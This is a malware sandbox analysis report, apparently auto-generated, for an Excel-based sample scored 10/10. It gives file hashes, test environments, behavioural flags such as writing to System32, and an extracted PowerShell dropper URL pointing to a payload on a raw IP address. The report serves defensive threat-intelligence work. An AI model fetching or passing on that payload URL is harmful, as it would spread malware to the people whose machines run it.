Overview

overview

10

Static

static

1

1498a673c6...c.xlsx

windows7-x64

10

1498a673c6...c.xlsx

windows10-1703-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    1498a673c6789a18bea45e231b3f33cc.zip

  • Size

    799KB

  • Sample

    230516-jxfj9abh56

  • MD5

    2b357e67ad98ee7e81054e1c7c67cbc4

  • SHA1

    8aba17f7ec9994fd4c3e60ac0a397b63810ab375

  • SHA256

    8267e9213af9ee45f0afb881ffa4a43f0b4f83c66e6ecd9265dacb0656a582b0

  • SHA512

    df8f084c74c58acbd1e77da0131f9d65ee7f53dbd877db4ece90150e377c9c9b64518ef6599b0c57498995b9adb0465642421605d9dc39d638f36dd7c41c81b8

  • SSDEEP

    24576:EnGHCl0deJ05X+tnTmd5/eaHuP098D/G/PY0tb6:cG/AJ0Z+t85eaHuPq8cYCb6

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://172.174.176.153/dll/new_rump_vb.net.txt

Targets

    • Target

      1498a673c6789a18bea45e231b3f33cc

    • Size

      805KB

    • MD5

      1498a673c6789a18bea45e231b3f33cc

    • SHA1

      aba3fe52930cd671a73eebe8cf7e4b2f693a2137

    • SHA256

      26c75f92dfbba046c472343b64987a309042e9e86c9393f46fb0d3cbe1ed38dd

    • SHA512

      b1e237285263029c8dab4fa3f7f8a3fefd351d51c69857a32ca33950d5af432fc23d49835f65da6e23c5b0cc3aa0b558f08b2bf0cb0f72f766e43aa9baf78a43

    • SSDEEP

      12288:8hxaTmOW1C+7D9qUclk8n1eKsvikcnKVJUpbvfoPPUuDuqu39yBhglPnu:8hH1CEDuLs6k20Ulvf4Uufuty2m

    Score
    10/10

    • Blocklisted process makes network request

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Enterprise v6

Tasks